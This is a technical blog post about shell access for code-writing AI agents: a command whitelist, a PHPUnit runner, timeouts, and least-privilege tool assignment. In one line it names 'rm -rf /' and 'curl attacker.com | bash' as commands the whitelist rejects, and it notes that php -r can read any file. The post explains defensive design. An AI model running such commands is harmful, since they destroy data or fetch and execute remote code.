AI Agents 20.02.2026

BashTool and RunTestsTool: Self-Check Loops for Code-Writing Agents

Why only VajbCoder and TestAgent get shell access — BashTool's allowed command whitelist (php -l, phpunit, phpstan), RunTestsTool for targeted PHPUnit execution, and the write-lint-test-fix self-check loop that catches errors before human review.

Code-writing agents have a unique problem: how do you know the code you just wrote actually works? You can't just generate code and hope — the AI needs to check its own output. BashTool and RunTestsTool make this possible.

BashTool: Whitelisted Shell Access

BashTool allows command execution, but only specific commands:

private const ALLOWED_COMMANDS = [
    'php -l',           // Syntax check
    'php -r',           // Quick PHP execution
    'phpunit',          // Test execution
    'phpstan',          // Static analysis
    'composer',         // Dependency info (not install)
    'git diff',         // See changes
    'git status',       // Check state
    'git log',          // History
];

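Every command is checked against this whitelist before execution, so a direct rm -rf / or curl attacker.com | bash is rejected. Two caveats apply: a prefix match is only safe if the check also refuses shell metacharacters such as ; and |, and php -r still runs arbitrary PHP, so the whitelist narrows what an agent can do rather than sandboxing it. The intended use is to lint, test, analyze, and inspect.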
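The article doesn't show how BashTool matches a command against the list, so here is a minimal sketch of one way the check could work. The function name isCommandAllowed and the metacharacter filter are assumptions for illustration, and str_starts_with assumes PHP 8.

```php
<?php
declare(strict_types=1);

// Same prefixes as the whitelist above, as a free-standing constant.
const ALLOWED_COMMANDS = [
    'php -l', 'php -r', 'phpunit', 'phpstan',
    'composer', 'git diff', 'git status', 'git log',
];

// Hypothetical helper, not the article's actual implementation.
function isCommandAllowed(string $command): bool
{
    $command = trim($command);

    // Refuse shell metacharacters first. Without this step,
    // "git status; rm -rf /" would pass a plain prefix check.
    if (preg_match('/[;&|`$<>\n\\\\]/', $command) === 1) {
        return false;
    }

    foreach (ALLOWED_COMMANDS as $prefix) {
        // Require the prefix to end at a word boundary,
        // so "phpunitx" does not match "phpunit".
        if ($command === $prefix || str_starts_with($command, $prefix . ' ')) {
            return true;
        }
    }

    return false;
}
```

This filter is deliberately strict: it also rejects most php -r snippets, because they tend to contain ; or $. A production version would more likely tokenize the command and pass it to proc_open as an argument array, skipping the shell altogether.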

Who Gets BashTool

Only VajbCoder and TestAgent. Not ReviewAgent (read-only). Not DocAgent (no need to run commands). Not KIK (orchestrator, not executor).

The reasoning: VajbCoder writes code and needs to verify that it parses and passes its checks. TestAgent writes tests and needs to run them. Other agents don't generate executable artifacts.

The Write-Lint-Test-Fix Loop

VajbCoder's typical iteration pattern:

Iteration 1: Read existing code → understand structure
Iteration 2: Write new code via write_file
Iteration 3: php -l newfile.php → syntax check
             If error: read error, fix code, go back to Iteration 2
Iteration 4: phpunit --filter NewFeatureTest → run tests
             If fail: read failure, fix code, go back to Iteration 2
Iteration 5: phpstan analyze newfile.php → static analysis
             If errors: fix type hints, go back to Iteration 2
Iteration 6: generate_patch (or confirm done) → auto-exit

The self-check loop catches three categories of errors:

Syntax errors — php -l catches missing semicolons, unmatched braces

Logic errors — phpunit catches wrong behavior, broken assertions

Type errors — phpstan catches missing type hints, null safety issues

Without this loop, the agent would generate code in one shot and hand it off. With the loop, the agent iterates until the code passes all checks — or runs out of iterations.
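To make the control flow concrete, here is a rough sketch of a bounded self-check loop. Everything in it is hypothetical: selfCheckLoop, the $generate callback standing in for the model call, and the $checks callbacks standing in for php -l, phpunit, and phpstan. The real runtime's loop isn't shown in the article.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical sketch of a write-check-fix loop with an iteration budget.
 *
 * @param callable(?string): string $generate Produces code, given the previous failure (or null).
 * @param array<string, callable(string): ?string> $checks Check name => callback returning an error or null.
 * @return array{passed: bool, iterations: int, lastError: ?string}
 */
function selfCheckLoop(callable $generate, array $checks, int $maxIterations): array
{
    $lastError = null;

    for ($i = 1; $i <= $maxIterations; $i++) {
        // Feed the previous failure back in so the next attempt can fix it.
        $code = $generate($lastError);
        $lastError = null;

        foreach ($checks as $name => $check) {
            $error = $check($code);
            if ($error !== null) {
                // Stop at the first failing check; later checks
                // are pointless until this one passes.
                $lastError = "$name: $error";
                break;
            }
        }

        if ($lastError === null) {
            return ['passed' => true, 'iterations' => $i, 'lastError' => null];
        }
    }

    // Budget exhausted: report the last failure instead of looping forever.
    return ['passed' => false, 'iterations' => $maxIterations, 'lastError' => $lastError];
}
```

Ordering the checks as lint, then tests, then static analysis mirrors the iteration list above: the cheapest check runs first, so a syntax error never costs a full test run.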

RunTestsTool

A specialized tool for TestAgent:

public function execute(array $params): array
{
    $testFile = $params['file'] ?? null;     // Specific test file
    $filter = $params['filter'] ?? null;     // --filter pattern
    $suite = $params['suite'] ?? null;       // --testsuite name

    $command = 'php vendor/bin/phpunit';
    if ($testFile !== null) $command .= ' ' . escapeshellarg($testFile);
    if ($filter !== null) $command .= ' --filter ' . escapeshellarg($filter);
    if ($suite !== null) $command .= ' --testsuite ' . escapeshellarg($suite);

    // Execute with timeout
    $output = $this->executeWithTimeout($command, 120);

    return ['success' => $this->parseSuccess($output), 'content' => $output];
}

Parameters are escaped with escapeshellarg(), so shell metacharacters in test file names or filter patterns reach PHPUnit as literal text instead of being interpreted by the shell.
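One thing escapeshellarg() does not cover is option injection: a "file" value such as --bootstrap=evil.php is a perfectly valid single argument. The sketch below pulls the command building into a standalone function and adds a leading-dash guard. Both buildPhpunitCommand and the guard are assumptions for illustration, not part of the RunTestsTool code shown above.

```php
<?php
declare(strict_types=1);

// Hypothetical standalone version of the command-building step.
function buildPhpunitCommand(array $params): string
{
    $file   = $params['file'] ?? null;
    $filter = $params['filter'] ?? null;
    $suite  = $params['suite'] ?? null;

    // Assumed extra guard: a value starting with "-" would be read by
    // PHPUnit as an option, and escaping alone does not prevent that.
    foreach ([$file, $suite] as $value) {
        if ($value !== null && str_starts_with($value, '-')) {
            throw new InvalidArgumentException('Value must not start with "-"');
        }
    }

    $command = 'php vendor/bin/phpunit';
    if ($file !== null) {
        $command .= ' ' . escapeshellarg($file);
    }
    if ($filter !== null) {
        $command .= ' --filter ' . escapeshellarg($filter);
    }
    if ($suite !== null) {
        $command .= ' --testsuite ' . escapeshellarg($suite);
    }

    return $command;
}
```

On Unix-like systems escapeshellarg() wraps the value in single quotes, so a filter like NewTest; rm -rf / arrives at PHPUnit as one odd-looking pattern rather than as a second command.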

TestAgent's Loop

Iteration 1: Read source code to understand what to test
Iteration 2: Read existing tests for patterns
Iteration 3: Write test file via write_file (tests/ only)
Iteration 4: run_tests(file: 'tests/Unit/NewTest.php')
             If fail: read output, fix test, rewrite
Iteration 5: run_tests(filter: 'NewTest') → confirm pass

TestAgent's WriteFileTool is restricted to tests/ — it can't accidentally modify production code while fixing a test failure.
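How the tests/ restriction is enforced isn't shown, so the following is only a sketch of one possible path check. The function name isWritableTestPath is hypothetical, and the check is purely string-based: it resolves . and .. segments but does not follow symlinks, which a real implementation would also need to consider.

```php
<?php
declare(strict_types=1);

// Hypothetical guard: accept only project-relative paths that stay inside tests/.
function isWritableTestPath(string $relativePath): bool
{
    $path = str_replace('\\', '/', $relativePath);

    // Absolute paths are rejected outright.
    if ($path === '' || $path[0] === '/') {
        return false;
    }

    $segments = [];
    foreach (explode('/', $path) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            if ($segments === []) {
                return false; // would climb above the project root
            }
            array_pop($segments);
            continue;
        }
        $segments[] = $segment;
    }

    // Must resolve to a file below tests/, not to tests/ itself.
    return count($segments) >= 2 && $segments[0] === 'tests';
}
```

Normalizing before comparing matters: a naive "starts with tests/" check would accept tests/../src/Foo.php, which resolves to production code.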

Command Timeout

Both tools enforce execution timeouts:

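private function executeWithTimeout(string $command, int $timeoutSeconds): string
{
    // Capture stdout and stderr through pipes
    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $process = proc_open($command, $descriptors, $pipes);
    // ... read output into $output with timeout, tracking $elapsedSeconds ...
    if ($elapsedSeconds > $timeoutSeconds) {
        proc_terminate($process);
        return "Command timed out after {$timeoutSeconds}s";
    }
    proc_close($process);
    return $output;
}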

Default timeout: 120 seconds. Long enough for a full PHPUnit suite, short enough that a hung command or an infinite loop in the code under test can't stall the agent indefinitely.
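The excerpt above elides the read loop. As a rough illustration of what that part might look like, here is a free-standing sketch built on non-blocking pipes and a polling loop. The function name runWithTimeout, the 50 ms poll interval, and the error string for a failed start are all assumptions, not the article's code.

```php
<?php
declare(strict_types=1);

// Hypothetical standalone sketch of a command runner with a wall-clock timeout.
function runWithTimeout(string $command, int $timeoutSeconds): string
{
    $descriptors = [
        1 => ['pipe', 'w'], // stdout
        2 => ['pipe', 'w'], // stderr
    ];
    $process = proc_open($command, $descriptors, $pipes);
    if (!is_resource($process)) {
        return 'Failed to start command';
    }

    // Non-blocking reads let the loop check the clock between chunks.
    stream_set_blocking($pipes[1], false);
    stream_set_blocking($pipes[2], false);

    $output = '';
    $start = microtime(true);
    $timedOut = false;

    while (true) {
        $output .= (string) stream_get_contents($pipes[1]);
        $output .= (string) stream_get_contents($pipes[2]);

        if (!proc_get_status($process)['running']) {
            break;
        }
        if (microtime(true) - $start > $timeoutSeconds) {
            // Sends SIGTERM to the process proc_open started; grandchildren
            // spawned by a shell wrapper may need separate handling.
            proc_terminate($process);
            $timedOut = true;
            break;
        }
        usleep(50000); // poll every 50 ms
    }

    // Drain anything written between the last read and process exit.
    $output .= (string) stream_get_contents($pipes[1]);
    $output .= (string) stream_get_contents($pipes[2]);

    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);

    return $timedOut ? "Command timed out after {$timeoutSeconds}s" : $output;
}
```

Reading inside the loop, rather than once at the end, also keeps a chatty command from blocking on a full pipe buffer before the timeout is ever checked.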

Why Not Give Every Agent BashTool

Shell access is the most powerful tool. An agent with BashTool can:

Read any file (via php -r and file_get_contents)

List directories (via php -r and scandir)

Check git history (via git log)

Run arbitrary PHP (via php -r)

Even with a whitelist, it's more capability than most agents need. ReviewAgent only needs to read — giving it BashTool would be capability bloat that increases attack surface without benefit.

The principle: every agent gets the minimum tools for its job. VajbCoder needs to lint and test its output → BashTool. ReviewAgent needs to read code → ReadFileTool. KIK needs to delegate → DelegateAgentTool.
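A deny-by-default lookup is one simple way to express this principle in code. The registry below is a hypothetical and partial sketch: it lists only the agent-to-tool pairings the article mentions, and the names AGENT_TOOLS and agentMayUse are invented for illustration.

```php
<?php
declare(strict_types=1);

// Partial, hypothetical registry: only the pairings named in the article.
const AGENT_TOOLS = [
    'VajbCoder'   => ['BashTool', 'WriteFileTool'],
    'TestAgent'   => ['BashTool', 'RunTestsTool', 'WriteFileTool'],
    'ReviewAgent' => ['ReadFileTool'],
    'KIK'         => ['DelegateAgentTool'],
];

function agentMayUse(string $agent, string $tool): bool
{
    // Deny by default: unknown agents and unlisted tools get nothing.
    return in_array($tool, AGENT_TOOLS[$agent] ?? [], true);
}
```

With an explicit allow list per agent, granting a new capability is a visible one-line change that can be reviewed, rather than something an agent inherits by accident.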

Up Next

ManageScheduleTool and SharedContextTool: Scheduling and Cross-Run Memory. How KIK manages scheduled agent runs via natural language, and how agents persist knowledge across executions.
